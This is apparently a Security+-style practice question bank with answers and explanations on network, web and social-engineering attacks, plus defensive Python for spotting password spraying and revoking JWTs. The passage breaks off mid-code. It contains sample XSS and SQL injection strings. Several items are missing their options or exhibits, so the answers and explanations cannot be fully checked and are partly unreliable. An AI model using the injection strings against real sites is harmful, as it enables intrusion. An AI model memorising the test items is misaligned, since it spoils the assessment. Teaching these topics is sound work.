During troubleshooting, several hosts in VLAN 20 lose access to the default gateway at random. Their ARP caches now map the gateway IP to a workstation MAC address, and traffic briefly flows through that workstation before timing out. What attack is most likely?
A. DNS poisoning, because the workstation name may be resolving to the wrong IP address.
B. ARP poisoning, because false ARP replies are redirecting gateway traffic to another host.
C. Replay attack, because the attacker is reusing old network frames to confuse the hosts.
D. Denial of service, because traffic eventually times out and connectivity is lost.
Answer: B
ARP poisoning fits exactly when a host sends falsified ARP information so victims associate the gateway IP with the attacker’s MAC address. That can enable interception, disruption, or man-in-the-middle behavior on the local subnet.
Why this answer
Option B is correct because the scenario describes classic ARP poisoning (also known as ARP spoofing). The attacker sends forged ARP replies to the hosts in VLAN 20, associating the gateway's IP address with the attacker's MAC address. This causes the hosts to forward traffic destined for the gateway to the attacker's workstation, where it is briefly forwarded (or dropped) before timing out, matching the symptoms of a man-in-the-middle attack via ARP cache corruption.
Exam trap
CompTIA often tests ARP poisoning by describing symptoms of gateway loss and ARP cache corruption, and the trap here is that candidates may confuse it with DNS poisoning because both involve redirection, but ARP poisoning operates at Layer 2 (MAC address) while DNS poisoning operates at Layer 7 (name resolution).
How to eliminate wrong answers
Option A is wrong because DNS poisoning involves corrupting DNS records to redirect domain names to malicious IPs, but the issue here is at Layer 2 (ARP) with MAC-to-IP mappings, not DNS resolution. Option C is wrong because a replay attack captures and retransmits valid network frames to impersonate a device or cause duplication, but it does not directly alter ARP caches or redirect gateway traffic to a workstation MAC. Option D is wrong because denial of service (DoS) aims to overwhelm or disrupt services, but the specific symptom of ARP cache entries mapping the gateway to a workstation MAC indicates active manipulation, not just traffic timing out as a secondary effect.
A threat intelligence feed says an adversary rotates domains daily, uses cloud VPS hosting, and reuses the same malware sample across several campaigns. Analysts want the indicator that remains useful even when the domain changes. What should they prioritize?
A. The current domain name because it is the easiest item to block immediately.
B. The malware's SHA-256 file hash because it uniquely identifies the sample.
C. The cloud provider's entire ASN because all traffic from that provider is automatically malicious.
D. The malware's file name because attackers usually keep the same name for convenience.
Answer: B
A file hash is a highly specific indicator for a known binary and remains useful even if the attacker changes domains or hosting providers. Since the report says the same malware sample is reused, the hash provides a stable detection and correlation point across campaigns. It is a stronger immediate IOC than infrastructure that can be replaced quickly.
Why this answer
The malware's SHA-256 file hash is the most persistent indicator because it is a cryptographic hash that uniquely identifies the specific binary sample, regardless of the domain or IP address used for delivery. Unlike domains or IPs, which the adversary can rotate daily, the hash remains constant as long as the same malware sample is reused across campaigns. This makes it a reliable indicator of compromise (IOC) for detection via file reputation or hash-based blocklists.
Exam trap
The trap here is that candidates often prioritize the most immediately blockable indicator (the domain) over the most persistent one (the hash), failing to recognize that adversaries specifically rotate domains to evade static blocklists.
How to eliminate wrong answers
Option A is wrong because the current domain name is ephemeral—the adversary rotates it daily, so blocking it provides only temporary protection and requires constant updates. Option C is wrong because the cloud provider's entire ASN is not automatically malicious; legitimate traffic also originates from that ASN, and blocking it would cause widespread false positives and deny service to benign users.
A caller says they are from IT support and asks a user to read back the one-time MFA code that just arrived on their phone. What type of attack is this most likely?
A. Phishing
B. Smishing
C. Vishing
D. Baiting
Answer: C
Vishing is voice phishing, where an attacker uses a phone call or VoIP call to manipulate a target. Asking for an MFA code by phone is a common and dangerous tactic because the attacker may be trying to complete a real login.
Why this answer
This is a vishing (voice phishing) attack because the attacker uses a phone call to socially engineer the victim into revealing a one-time MFA code. Unlike phishing (email) or smishing (SMS), vishing relies on voice communication to bypass technical controls and trick the user into providing the code, which the attacker can then use to authenticate as the victim.
Exam trap
The trap here is that candidates see 'MFA code' and 'phone' and incorrectly assume smishing (SMS-based phishing), but the attack vector is the voice call, not the text message, which defines it as vishing.
How to eliminate wrong answers
Option A is wrong because phishing specifically refers to attacks carried out via email, often with malicious links or attachments, not a phone call requesting an MFA code. Option B is wrong because smishing is conducted via SMS text messages, not a voice call; while the MFA code arrives via SMS, the attack vector is the phone call, making it vishing.
Based on the exhibit, what type of malware behavior is most likely occurring?
A. Ransomware, because the endpoint made an outbound connection after opening a document.
B. Fileless attack, because PowerShell was launched in memory with no new payload written to disk.
C. Spyware, because the laptop made an encrypted outbound connection.
D. Worm activity, because the laptop communicated with an external IP address.
Answer: B
This is a fileless attack because the malicious activity relies on script execution rather than a traditional dropped executable. The encoded PowerShell command, hidden execution, and absence of a new file on disk strongly indicate memory-based or script-based malware behavior that can evade basic file scanning.
Why this answer
The exhibit shows PowerShell being launched in memory with no new payload written to disk, which is the hallmark of a fileless attack. Fileless malware exploits legitimate system tools like PowerShell to execute malicious code directly in memory, evading traditional signature-based detection that relies on scanning files on disk.
Exam trap
The trap here is that candidates see an outbound connection and immediately assume ransomware or spyware, but the key indicator is PowerShell executing in memory with no disk write, which is the defining characteristic of a fileless attack.
How to eliminate wrong answers
Option A is wrong because ransomware typically encrypts files and demands payment, but the exhibit shows no evidence of file encryption or ransom note; the outbound connection alone does not confirm ransomware. Option C is wrong because spyware exfiltrates data over encrypted channels, but the exhibit lacks indicators of data collection or exfiltration; an encrypted outbound connection is common for many legitimate applications. Option D is wrong because worm activity involves self-replicating propagation across networks, and the exhibit only shows a single outbound connection to an external IP, which is insufficient to confirm worm behavior.
A vulnerability scan reports that a public web server is running an operating system version that no longer receives security updates. Which issue is present?
An unsupported operating system is an outdated component because it no longer receives vendor security fixes.
Why this answer
An operating system version that no longer receives security updates is an outdated component. This means the vendor has ceased patching known vulnerabilities, leaving the system exposed to exploits that target unpatched flaws. In the context of a public web server, this directly violates the principle of maintaining a secure baseline and is a common finding in vulnerability scans.
Exam trap
The trap here is that candidates may confuse 'outdated component' with 'weak permissions' because both involve configuration issues, but the question specifically describes a version that no longer receives updates, which is a lifecycle/obsolescence problem, not a permissions misconfiguration.
How to eliminate wrong answers
Option A is wrong because weak permissions refer to misconfigured access controls (e.g., world-writable files or improper ACLs), not the age or update status of the OS itself. Option C is wrong because DNS poisoning is an attack that corrupts DNS resolution data (e.g., spoofed A records) to redirect traffic, unrelated to the OS version's patch level. Option D is wrong because smishing is a social engineering attack using SMS text messages to trick users into revealing information, not a technical vulnerability in server software.
An organization is implementing security controls to mitigate the risk of social engineering attacks. Which three of the following are effective mitigations? (Choose three.)
Select 3 answers:
- Implementing a strict clean desk policy
- Conducting regular security awareness training for all employees
- Deploying email filtering and anti-phishing gateways
- Requiring multifactor authentication for all systems
- Installing physical barriers at building entrances
- Disabling USB ports on all workstations
Why this answer
Security awareness training is a critical mitigation because it educates employees to recognize and resist social engineering tactics such as phishing, pretexting, and baiting. By regularly updating training content to reflect current attack vectors, organizations reduce the likelihood that human error will be exploited. This directly addresses the human factor, which is often the weakest link in security.
Exam trap
The trap here is that candidates often confuse general security best practices (like clean desk policies or disabling USB ports) with specific mitigations for social engineering, failing to recognize that social engineering exploits human behavior and communication channels, not just physical or technical vectors.
After a switch reboot in a conference room, several laptops obtain valid IP addresses in the correct subnet, but their default gateway changes to 10.20.40.50, which is not the legitimate router. Packet capture shows DHCP offers coming from a MAC address that does not belong to the approved DHCP server, and the rogue device responds faster than the real server. What attack is most likely occurring?
A. ARP poisoning, because the attacker is changing IP-to-MAC mappings on the local network.
B. Rogue DHCP service, because an unauthorized DHCP server is handing out network settings.
C. Replay attack, because the attacker is reusing old DHCP offers.
D. DNS poisoning, because the clients are being sent to the wrong network path.
Answer: B
A rogue DHCP service is the best answer. The clients receive valid-looking leases from an unauthorized device, and the device supplies the default gateway before the legitimate server can respond. This is a common and dangerous network attack because it can redirect traffic, enable interception, or break connectivity without requiring packet spoofing at the ARP layer.
Why this answer
The scenario describes an unauthorized device responding to DHCP discovery messages faster than the legitimate server, assigning valid IPs but a rogue default gateway (10.20.40.50). This is the classic behavior of a rogue DHCP server, which intercepts DHCP traffic to manipulate client network settings, enabling man-in-the-middle attacks. The packet capture confirming DHCP offers from an unknown MAC address directly identifies the attack as a Rogue DHCP service.
Exam trap
The trap here is that candidates confuse the symptom (wrong gateway) with ARP poisoning or DNS attacks, but the key clue is the DHCP offer source and the faster response time, which uniquely identifies a rogue DHCP server.
How to eliminate wrong answers
Option A is wrong because ARP poisoning involves sending forged ARP replies to associate an attacker's MAC address with a legitimate IP, not distributing DHCP lease offers with a fake gateway. Option C is wrong because a replay attack would capture and retransmit valid DHCP offers from the real server, not generate new offers with a different gateway IP from an unauthorized MAC. Option D is wrong because DNS poisoning manipulates DNS resolution to redirect traffic to malicious sites, whereas this attack alters the default gateway at the network layer via DHCP, not DNS records.
Based on the exhibit, what type of web attack is most likely taking place?
A. Cross-site scripting, because the input is visible in the URL and causes an error.
B. SQL injection, because the attacker is manipulating the database query with crafted input.
C. Broken authentication, because the application returns a 500 error.
D. Insecure deserialization, because the application is parsing attacker-controlled data.
Answer: B
This is SQL injection because the input includes SQL control characters and logic that alter the intended query. The database error and the developer note about string concatenation confirm that user-supplied data is being inserted directly into SQL without parameterization. That makes the application vulnerable to query manipulation.
Why this answer
Option B is correct because the exhibit shows a URL parameter (e.g., `id=1 OR 1=1`) that is being passed to a database query. The attacker is injecting SQL syntax to manipulate the query logic, which is the hallmark of SQL injection. The 500 error likely results from the database server crashing or returning an invalid result set, confirming that the injection is affecting the database.
Exam trap
The trap here is that candidates see the input in the URL and the error message and mistakenly associate them with cross-site scripting (XSS), failing to recognize that the error is a database server response, not a client-side script execution.
How to eliminate wrong answers
Option A is wrong because cross-site scripting (XSS) involves injecting client-side scripts (e.g., JavaScript) into a web page, not manipulating database queries; the visible input in the URL and the error are not indicative of XSS, which typically executes in the browser. Option C is wrong because broken authentication refers to flaws in session management or credential verification (e.g., weak passwords, session fixation), not to database query manipulation or server errors from SQL injection. Option D is wrong because insecure deserialization involves the processing of serialized objects (e.g., PHP or Java serialization) that can lead to remote code execution, not the direct injection of SQL commands into a URL parameter.
A web portal builds its database query by directly appending a user's search input. When the user types a single quote, the application returns a database error. Which attack is most likely?
SQL injection happens when untrusted input alters a database query the application should have protected.
Why this answer
The application directly concatenates user input into a database query without sanitization. When a single quote (') is appended, it breaks the SQL string delimiter, causing a syntax error that the database exposes. This is the classic indicator of a SQL injection vulnerability, where an attacker can manipulate the query structure.
Exam trap
The trap here is that candidates may confuse the immediate symptom (a database error) with cross-site scripting, but the single quote directly points to SQL syntax breakage, not script execution in the browser.
How to eliminate wrong answers
Option A is wrong because cross-site scripting (XSS) involves injecting client-side scripts into web pages viewed by other users, not directly causing database errors via a single quote in a query. Option C is wrong because DNS poisoning corrupts DNS resolver caches to redirect traffic, not database query manipulation. Option D is wrong because privilege escalation is the act of gaining elevated access rights, not the injection technique that leads to unauthorized data access.
Based on the exhibit, what type of social engineering attack is the caller using?
A. Vishing, because the attacker is using a phone call to pressure the target.
B. Ransomware, because the caller is asking for money.
C. SQL injection, because the caller is asking for account details.
D. Tailgating, because the attacker mentions an executive assistant.
Answer: A
The attacker is making a voice call and using urgency, authority, and time pressure to obtain sensitive financial information. That is a classic example of vishing, which is phishing conducted over the phone.
Why this answer
The caller is using a phone call to impersonate a trusted figure (the CEO) and create urgency to pressure the target into violating security policy. This matches the definition of vishing (voice phishing), which relies on social engineering over voice channels to extract sensitive information or actions.
Exam trap
The trap here is that candidates may confuse the mention of 'asking for money' with ransomware, but ransomware is a technical malware attack, not a social engineering phone call, and the question explicitly describes a phone-based interaction.
How to eliminate wrong answers
Option B is wrong because ransomware is a type of malware that encrypts files and demands payment for decryption, not a social engineering attack conducted via phone call. Option C is wrong because SQL injection is a web application attack that exploits improper input validation to manipulate database queries, not a social engineering technique. Option D is wrong because tailgating is a physical security attack where an unauthorized person follows an authorized individual into a restricted area without proper authentication, not a phone-based social engineering tactic.
A user says their files suddenly have a new extension and a note appears demanding payment to restore access. Which type of malware is most likely involved?
A. Ransomware
B. Adware
C. Spam filter
D. Screen saver
Answer: A
Ransomware commonly encrypts files and leaves a payment demand, which matches the described symptoms.
Why this answer
Ransomware is the correct answer because it specifically encrypts files and appends a new extension, then displays a ransom note demanding payment for decryption. This matches the user's description of files becoming inaccessible with a new extension and a payment demand.
Exam trap
The trap here is that candidates may confuse ransomware with adware or other malware types, but the key differentiator is the combination of file encryption, extension change, and a ransom demand.
How to eliminate wrong answers
Option B (Adware) is wrong because adware displays unwanted advertisements and does not encrypt files or demand ransom payments. Option C (Spam filter) is wrong because a spam filter is a security tool that blocks unwanted email, not a type of malware that modifies files. Option D (Screen saver) is wrong because a screen saver is a benign utility that prevents screen burn-in and has no capability to encrypt files or demand payments.
A help desk analyst receives a ticket stating that an employee got an urgent text message from someone claiming to be the CEO. The message asked the employee to buy gift cards and send the redemption codes immediately. What attack is most likely taking place?
A. Phishing, because the attacker is trying to steal information through a deceptive message sent to a user.
B. Smishing, because the attacker is using SMS or text messaging to trick the employee into taking an action.
C. Vishing, because the attacker is using a phone call to pressure the employee into complying.
D. Baiting, because the attacker is tempting the user with a reward in exchange for cooperation.
Answer: B
Smishing is phishing delivered through text messaging. The attacker is impersonating an executive and creating urgency to pressure the employee into buying gift cards and revealing codes. That combination of mobile delivery, impersonation, and urgency fits a text-based social engineering attack.
Why this answer
Option B is correct because the attack uses SMS/text messaging as the delivery vector, which is the defining characteristic of smishing. The urgent request to buy gift cards and send redemption codes is a classic social engineering tactic designed to exploit the employee's trust in the CEO's authority, not to steal credentials or install malware directly.
Exam trap
The trap here is that candidates may confuse smishing with general phishing (Option A) because both involve deceptive messages, but the exam specifically tests the delivery vector—SMS vs. email—as the key differentiator for attack classification.
How to eliminate wrong answers
Option A is wrong because phishing typically refers to broader email-based attacks, not specifically SMS/text messages; while smishing is a subset of phishing, the question explicitly describes a text message, making smishing the more precise term. Option C is wrong because vishing (voice phishing) requires a phone call, not a text message; the scenario lacks any mention of a voice interaction. Option D is wrong because baiting involves offering a fake reward or enticement (e.g., free download or USB drop) to trick the user, whereas this attack uses a direct request for action under false authority, not a lure.
At a conference, employees connect to a Wi-Fi network named "CorpGuest" and then see certificate warnings in their browsers. The network has a stronger signal than the hotel's legitimate guest Wi-Fi. What attack is this?
A rogue access point, often called an evil twin, imitates a real network to lure users onto it.
Why this answer
This scenario describes a rogue access point attack. The attacker sets up a Wi-Fi network named "CorpGuest" with a stronger signal than the legitimate hotel guest Wi-Fi, tricking employees into connecting to it. Once connected, the attacker can intercept traffic and present a fake certificate, causing browser certificate warnings.
This is a classic evil twin variant of a rogue access point attack.
Exam trap
The trap here is that candidates may confuse a rogue access point with ARP poisoning because both can enable man-in-the-middle attacks, but the key differentiator is the method of initial access — rogue AP uses a fake wireless network, while ARP poisoning operates on an existing wired or wireless LAN.
How to eliminate wrong answers
Option B (ARP poisoning) is wrong because ARP poisoning involves sending forged ARP messages over a local network to associate the attacker's MAC address with the IP address of a legitimate host, enabling man-in-the-middle attacks on switched networks; it does not involve setting up a fake Wi-Fi network. Option C (Replay attack) is wrong because a replay attack captures and retransmits valid data transmissions to trick the receiver, not to create a fraudulent wireless network or cause certificate warnings. Option D (Denial of service) is wrong because a denial of service attack aims to disrupt or degrade network services, not to impersonate a legitimate access point and intercept user traffic.
Based on the exhibit, what security issue is most likely present?
A. Weak permissions, because the camera streams video to multiple ports.
B. Default credentials, because the admin login is enabled.
C. Exposed service, because management and streaming ports are listening on all interfaces and allowed from anywhere.
D. Outdated component, because firmware version 1.0.3 is listed.
Answer: C
The main issue is exposed service. The camera-web and RTSP services listen on 0.0.0.0, which means all interfaces, and the ACL allows any source to connect. That exposes the device to the network far beyond the intended management scope, creating an easy attack path.
Why this answer
Option C is correct because the exhibit shows that both the management interface (TCP 443) and the streaming interface (TCP 554) are bound to 0.0.0.0 (all interfaces) and the firewall rules allow traffic from 0.0.0.0/0 (any source). This exposes the camera's web management and RTSP streaming services to the entire internet, making it vulnerable to unauthorized access, reconnaissance, and potential exploitation. An exposed service of this nature is a common entry point for attackers to compromise IoT devices.
Exam trap
The trap here is that candidates may focus on the presence of default credentials or outdated firmware as obvious vulnerabilities, but the exhibit does not provide evidence of those—instead, the clear misconfiguration is the service exposure, which is a distinct and common threat in IoT and network device security.
How to eliminate wrong answers
Option A is wrong because streaming video to multiple ports is a normal function of an IP camera (e.g., RTSP on port 554 and HTTP on port 80 for web viewing), and does not inherently indicate weak permissions; weak permissions would refer to misconfigured access control lists or user privileges, not the number of ports used. Option B is wrong because the admin login being enabled is not itself a security issue; the vulnerability arises only if default credentials (e.g., admin/admin) are still in use, which is not indicated in the exhibit. Option D is wrong because firmware version 1.0.3 being listed does not automatically mean it is outdated or vulnerable; without a known CVE or version comparison, the version number alone is not evidence of an outdated component.
An employee receives a text message from an unknown number pretending to be IT. It includes a shortened URL for "urgent MFA re-enrollment" and says the account will be locked in 15 minutes. What is the best response?
A. Open the link and enter the requested information if the page looks legitimate.
B. Report the message through the official security channel and verify the request using known IT contact information.
C. Forward the text to coworkers so they can check whether they received the same message.
D. Reply to the text asking for a company badge number before proceeding.
Answer: B
The safest response is to avoid the link and use an established internal reporting or verification process. This prevents credential theft and helps security track suspicious messages quickly. Verifying through a known contact method, not the message itself, protects the user from smishing and MFA baiting.
Why this answer
Option B is correct because it follows the principle of verifying unsolicited requests through trusted channels, which is a key defense against social engineering and phishing attacks. The message exhibits classic phishing indicators: an unknown sender, a shortened URL (which can mask the true destination), a false sense of urgency, and a request for MFA re-enrollment—a common pretext to harvest credentials or MFA tokens. Reporting through the official security channel ensures the incident is logged and investigated, while verifying with known IT contact information prevents falling for a spoofed or compromised source.
Exam trap
The trap here is that candidates may choose Option A because the message appears urgent and the page looks legitimate, overlooking that attackers can perfectly clone authentication portals and that shortened URLs are a common obfuscation technique in phishing campaigns.
How to eliminate wrong answers
Option A is wrong because opening a shortened URL from an unknown sender and entering credentials, even if the page looks legitimate, risks credential theft via a phishing site that may mimic the real MFA portal; attackers can clone login pages and intercept tokens in real time. Option C is wrong because forwarding the text to coworkers amplifies the threat by spreading a potential phishing link, increasing the likelihood of compromise across the organization; it also bypasses proper incident reporting procedures. Option D is wrong because replying to the text confirms the phone number is active and monitored, which can lead to targeted follow-up attacks, and asking for a badge number is ineffective since attackers can easily fabricate such identifiers.
A user enters `<script>alert('test')</script>` into a public comment field, and other visitors see the script run in their browsers. What attack is this?
A. Cross-site scripting
B. SQL injection
C. Broken authentication
D. Insecure deserialization
Answer: A
Cross-site scripting occurs when attacker-controlled script is stored or reflected and then runs in another user's browser. A comment field that executes script for later visitors is a textbook example.
Why this answer
This is a classic cross-site scripting (XSS) attack because the user-supplied input containing a script tag is echoed back to other visitors' browsers without proper sanitization or encoding. The script executes in the context of the victim's browser, allowing the attacker to steal cookies, redirect users, or deface the page. XSS exploits the trust a user has for a particular website, unlike SQL injection which targets the database.
Exam trap
The trap here is that candidates confuse client-side attacks (XSS) with server-side attacks (SQL injection) because both involve user input, but XSS targets the browser's execution context while SQL injection targets the database query parser.
How to eliminate wrong answers
Option B (SQL injection) is wrong because SQL injection involves injecting malicious SQL queries into input fields to manipulate a backend database, not to execute client-side scripts in a browser. Option C (Broken authentication) is wrong because broken authentication refers to flaws in session management or credential handling (e.g., weak passwords, session fixation), not the injection of client-side code that runs in other users' browsers.
A security analyst is reviewing authentication logs from a corporate web application. The logs show thousands of failed login attempts over the past hour. Each attempt uses a different username, but all attempts use the same password 'Spring2024!'. The source IP addresses are widely distributed across several different geographic regions. Which type of attack is the analyst most likely observing?
A. Brute-force attack
B. Password spraying attack
C. Credential stuffing attack
D. Dictionary attack
Answer: B
Password spraying involves using a small number of common passwords against a large number of user accounts. This matches the log pattern: different usernames, same password, many attempts.
Why this answer
The attack uses a single common password ('Spring2024!') against many different usernames, which is the hallmark of a password spraying attack. Unlike brute-force attacks that target one account with many passwords, password spraying avoids account lockout by trying one password across many accounts. The wide distribution of source IPs is consistent with a distributed password spraying campaign, often using botnets or proxies.
Exam trap
The trap here is confusing password spraying with credential stuffing: candidates see 'different usernames' and assume stolen credentials are being used, but the single reused password across all attempts is the key differentiator for password spraying.
How to eliminate wrong answers
Option A is wrong because a brute-force attack typically targets a single username with many password attempts, not a single password against many usernames. Option C is wrong because credential stuffing uses previously leaked username/password pairs from other breaches, not a single password across different usernames. Option D is wrong because a dictionary attack tries many passwords from a wordlist against a single account, not a single password against many accounts.
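The distinction this question tests (same password across many accounts versus many passwords against one account versus leaked pairs replayed once each) can be turned into a simple cardinality check over failed-login events. The following is an added example written for this question bank, not code from any real product: the log line layout, the `pwhash` fingerprint field (real systems must never log plaintext passwords; the fingerprint only distinguishes "same" from "different" password), and the thresholds are all assumptions. It goes slightly beyond the scenario by also separating brute force and credential stuffing from spraying.

```python
"""Classify a burst of failed logins by username / password / source cardinality.

Added example for this question bank; the log format, the field names and the
thresholds below are assumptions, not taken from any real product.
"""
import re
from collections import Counter

# Field layout is constructed for this example. `pwhash` is a short, constructed
# fingerprint that only lets us tell "same password" from "different password".
LOG_RE = re.compile(
    r"(?P<ts>\S+) auth=FAIL user=(?P<user>\S+) pwhash=(?P<pwhash>\S+) src=(?P<src>\S+)"
)

# Constructed sample: many users, one password, widely spread source IPs
# (the pattern described in the question).
SPRAY_LOGS = """\
2024-04-02T08:01:10Z auth=FAIL user=alice pwhash=7f3a src=203.0.113.10
2024-04-02T08:01:12Z auth=FAIL user=bob pwhash=7f3a src=198.51.100.23
2024-04-02T08:01:15Z auth=FAIL user=carol pwhash=7f3a src=192.0.2.77
2024-04-02T08:01:19Z auth=FAIL user=dave pwhash=7f3a src=203.0.113.44
2024-04-02T08:01:22Z auth=FAIL user=erin pwhash=7f3a src=198.51.100.9
2024-04-02T08:01:25Z auth=FAIL user=frank pwhash=7f3a src=192.0.2.130
"""

# Constructed sample: one user, many passwords, one source (brute force).
BRUTE_LOGS = """\
2024-04-02T08:05:01Z auth=FAIL user=alice pwhash=0a01 src=203.0.113.10
2024-04-02T08:05:02Z auth=FAIL user=alice pwhash=0a02 src=203.0.113.10
2024-04-02T08:05:03Z auth=FAIL user=alice pwhash=0a03 src=203.0.113.10
2024-04-02T08:05:04Z auth=FAIL user=alice pwhash=0a04 src=203.0.113.10
2024-04-02T08:05:05Z auth=FAIL user=alice pwhash=0a05 src=203.0.113.10
2024-04-02T08:05:06Z auth=FAIL user=alice pwhash=0a06 src=203.0.113.10
"""

# Constructed sample: many users, each tried once with its own leaked
# password (credential stuffing).
STUFFING_LOGS = """\
2024-04-02T08:09:01Z auth=FAIL user=alice pwhash=c1c1 src=198.51.100.5
2024-04-02T08:09:02Z auth=FAIL user=bob pwhash=c2c2 src=198.51.100.5
2024-04-02T08:09:03Z auth=FAIL user=carol pwhash=c3c3 src=198.51.100.6
2024-04-02T08:09:04Z auth=FAIL user=dave pwhash=c4c4 src=198.51.100.6
2024-04-02T08:09:05Z auth=FAIL user=erin pwhash=c5c5 src=198.51.100.7
2024-04-02T08:09:06Z auth=FAIL user=frank pwhash=c6c6 src=198.51.100.7
"""

MIN_EVENTS = 5           # below this, do not classify at all (assumed threshold)
SPRAY_MAX_PASSWORDS = 3  # "a small number of passwords" (assumed threshold)
SPRAY_MIN_USERS = 5      # "against many accounts" (assumed threshold)


def parse_failures(text):
    """Return one dict per failed-login line that matches LOG_RE."""
    return [m.groupdict() for m in map(LOG_RE.search, text.splitlines()) if m]


def summarize(events):
    """Cardinalities that separate the attack patterns from each other."""
    per_user = Counter(e["user"] for e in events)
    return {
        "attempts": len(events),
        "users": len(per_user),
        "passwords": len({e["pwhash"] for e in events}),
        "sources": len({e["src"] for e in events}),
        "max_attempts_per_user": max(per_user.values(), default=0),
    }


def classify(events):
    s = summarize(events)
    if s["attempts"] < MIN_EVENTS:
        return "insufficient_data"
    # Few passwords, many accounts: the password-spraying signature.
    if s["passwords"] <= SPRAY_MAX_PASSWORDS and s["users"] >= SPRAY_MIN_USERS:
        return "password_spraying"
    # One account, many passwords: brute force. A dictionary attack looks the
    # same in the logs; whether the guesses came from a wordlist is not observable here.
    if s["users"] == 1 and s["passwords"] > SPRAY_MAX_PASSWORDS:
        return "brute_force"
    # Many accounts, each with its own password, one try each: leaked pairs replayed.
    if (s["users"] >= SPRAY_MIN_USERS and s["passwords"] >= s["users"]
            and s["max_attempts_per_user"] == 1):
        return "credential_stuffing"
    return "unclassified"


if __name__ == "__main__":
    for name, text in [("spray", SPRAY_LOGS), ("brute", BRUTE_LOGS), ("stuffing", STUFFING_LOGS)]:
        events = parse_failures(text)
        print(name, classify(events), summarize(events))
```

The source-IP count is reported but deliberately not used for classification: as the explanation notes, a spread of source addresses is consistent with a distributed spraying campaign, but it is the password-to-user ratio, not the IP spread, that separates spraying from the other patterns.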
Based on the exhibit, what network attack is most likely occurring on the office LAN?
A. ARP poisoning, because a rogue system is sending false layer 2 address mappings.
B. Replay attack, because the same ARP reply appears multiple times.
C. Denial of service, because users notice certificate warnings.
D. DNS poisoning, because the users cannot reach internal sites cleanly.
Answer: A
ARP poisoning is the best answer because the capture shows false ARP replies mapping the gateway IP to a different MAC address. The alternating gateway cache entries and certificate warnings are consistent with traffic being redirected through an attacker in a man-in-the-middle position.
Why this answer
ARP poisoning is the correct answer because the exhibit shows a rogue system sending unsolicited ARP replies that map the gateway's IP address to the attacker's MAC address. This causes traffic destined for the gateway to be redirected to the attacker, enabling man-in-the-middle interception. The attack exploits the lack of authentication in ARP, allowing false layer 2 address mappings to corrupt the ARP cache of other hosts on the LAN.
Exam trap
The trap here is that candidates may confuse ARP poisoning with DNS poisoning because both involve false mappings, but ARP poisoning operates at layer 2 (MAC addresses) while DNS poisoning operates at the application layer (domain names), and the exhibit's focus on MAC address mappings clearly points to ARP.
How to eliminate wrong answers
Option B is wrong because replay attacks involve capturing and retransmitting valid packets, but the exhibit shows multiple identical ARP replies from a single rogue source, not a replay of a legitimate ARP response. Option C is wrong because certificate warnings are typically associated with TLS/SSL interception or rogue access points, not directly with ARP poisoning, and the exhibit does not indicate a denial of service condition. Option D is wrong because DNS poisoning targets the DNS resolver cache with false domain-to-IP mappings, whereas the exhibit shows ARP replies manipulating MAC-to-IP mappings at layer 2, not DNS records.
A security tool reports repeated DNS requests for long, random-looking subdomains under the same domain name. What is the most likely explanation?
A. DNS tunneling used to hide command-and-control traffic.
B. A normal software update process from the operating system.
C. A successful password reset workflow for users.
D. A hardware failure on the network adapter.
Answer: A
Long, random subdomains can be a sign of DNS tunneling, where malware hides data or control traffic inside DNS queries.
Why this answer
DNS tunneling encodes non-DNS traffic (e.g., C2 commands) into DNS queries and responses, often using long, random-looking subdomains to evade detection. Repeated requests for such subdomains under a single domain are a classic indicator of data exfiltration or covert channel activity, as each query can carry a small payload.
Exam trap
The trap here is that candidates may confuse DNS tunneling with legitimate DNS behavior like load balancing or CDN resolution, but the randomness and repetition of subdomains under a single domain are the key differentiators for malicious covert channels.
How to eliminate wrong answers
Option B is wrong because normal software updates use predictable, vendor-specific domains and do not generate random-looking subdomains; they typically fetch files from known URLs or CDNs. Option C is wrong because password reset workflows involve HTTP/HTTPS traffic to a web application, not DNS queries with random subdomains; DNS is not used to carry password reset data.
A SaaS portal issues signed JWTs in a browser cookie. The help desk confirms a user logged out at 09:10, but SIEM logs show the same token was accepted from a different IP at 09:12 and continued working until the token expired. The application does not keep a server-side revocation list. What weakness is most likely being abused?
A. SQL injection, because the attacker must be manipulating backend database logic to reuse the token.
B. Session hijacking or session abuse, because the attacker can replay a valid token after logout without revocation.
C. Insecure deserialization, because the token is being decoded and reconstructed on the server.
D. Cross-site request forgery, because the request is coming from a different IP address.
Answer: B
This is session hijacking or session abuse because the attacker is using a valid session token outside the original user context. JWTs are often stateless, so if the application does not track revocation, logout may not immediately invalidate a copied token. The cross-IP reuse after logout strongly suggests the token was stolen or replayed and remained acceptable until its normal expiration.
Why this answer
The correct answer is B because the scenario describes a classic session hijacking or session abuse attack. The application issues signed JWTs in cookies and does not maintain a server-side revocation list, meaning once a token is issued, it remains valid until its expiration. Even after the legitimate user logs out at 09:10, the attacker can replay the same JWT from a different IP at 09:12, and the server will accept it because there is no mechanism to invalidate the token.
This lack of revocation is the core weakness being exploited.
Exam trap
The trap here is that candidates may confuse session hijacking with CSRF, but CSRF requires a forged request from a different site, not simply a different IP address, and the key issue is the lack of token revocation after logout.
How to eliminate wrong answers
Option A is wrong because SQL injection involves manipulating database queries through input fields, not replaying a valid JWT; the attacker is not altering backend logic but simply reusing a stolen token. Option C is wrong because insecure deserialization refers to vulnerabilities when untrusted data is deserialized, potentially leading to remote code execution, but JWTs are typically decoded and verified using cryptographic signatures, not deserialized in a way that allows code injection. Option D is wrong because cross-site request forgery (CSRF) exploits the trust a site has in a user's browser by forging requests from a different origin, not by replaying a token from a different IP address; the IP change alone does not indicate CSRF.
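The weakness in this scenario is that a signature-and-expiry check alone cannot tell a logged-out token from a live one. The following added example (written for this question bank, not the portal's own code) reproduces the 09:10 logout / 09:12 replay sequence with fixed timestamps and shows the fix: a server-side revocation list keyed on the token's `jti` claim, pruned as tokens expire. It assumes HS256 tokens built with the standard library only and a constructed demo key.

```python
"""Signed JWT verification with and without a server-side revocation list.

Added example, not code from the portal in the scenario. Assumptions: HS256
(HMAC-SHA256) tokens, a constructed demo key, and fixed timestamps so the
logout / replay sequence is reproducible offline.
"""
import base64
import hashlib
import hmac
import json
import secrets

KEY = b"constructed-demo-key-do-not-reuse"   # constructed; never hard-code real keys
T0 = 1_700_000_000                            # stands in for the login time


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_token(sub: str, ttl_seconds: int, now: int, key: bytes = KEY) -> str:
    """Mint an HS256 JWT; `jti` is the unique id we can revoke by later."""
    header = {"alg": "HS256", "typ": "JWT"}
    payload = {"sub": sub, "iat": now, "exp": now + ttl_seconds, "jti": secrets.token_hex(8)}
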